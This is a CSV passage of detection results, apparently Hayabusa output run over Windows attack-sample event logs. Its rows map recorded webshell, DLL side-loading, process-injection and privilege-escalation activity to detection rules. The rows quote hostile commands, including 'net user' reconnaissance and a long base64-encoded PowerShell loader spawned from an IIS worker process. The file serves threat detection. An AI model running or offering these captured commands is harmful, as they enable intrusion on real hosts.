Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,info,,Process Created,"Cmd: net user | Process: C:\Windows\System32\net.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""c:\windows\system32\cmd.exe"" /c net user | LID: 0x9cf992 | PID: 788 | PGUID: 365ABB72-4A01-5CE7-0000-00102DA1AC00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\net1 user | Process: C:\Windows\System32\net1.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: net user | LID: 0x9cf992 | PID: 712 | PGUID: 365ABB72-4A01-5CE7-0000-0010B6A2AC00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc,Local Accounts 
Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-25 00:38:21.485 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell ExecPolicy Changed | SetValue: HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ExecutionPolicy: Unrestricted | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3208 | PGUID: 365ABB72-0FAE-5CE8-0000-0010FE1E0800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_powershell_execpolicy_changed_sysmon_13.evtx +2019-05-26 13:01:42.385 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x12962 | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.385 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.545 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.966 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.966 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.966 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src PID: 3884 | Src PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Tgt PID: 3908 | Tgt PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\svchost.exe | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | LID: 0x3e7 | PID: 3908 | PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Evas | PrivEsc,Suspect Svchost Activity,,rules/sigma/process_creation/proc_creation_win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:44.047 +09:00,IEWIN7,5,info,,Process 
Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:44.598 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\System32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.727 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:57.628 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49166 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: 
C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49167 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49168 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49169 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | 
PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49170 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49171 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.752 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\notepad.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3388 | Src PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100 | Tgt PID: 1240 | Tgt PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.752 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\notepad.exe | LID: 0x3e7 | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:01.864 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49172 (IEWIN7) | Dst: 10.0.2.18:888 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\notepad.exe | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAX
wBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 2584 | PGUID: 365ABB72-3D4A-5CEB-0000-0010FA93FD00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Suspicious Execution of Powershell with Base64,,rules/sigma/process_creation/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web 
Servers,,rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.000 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
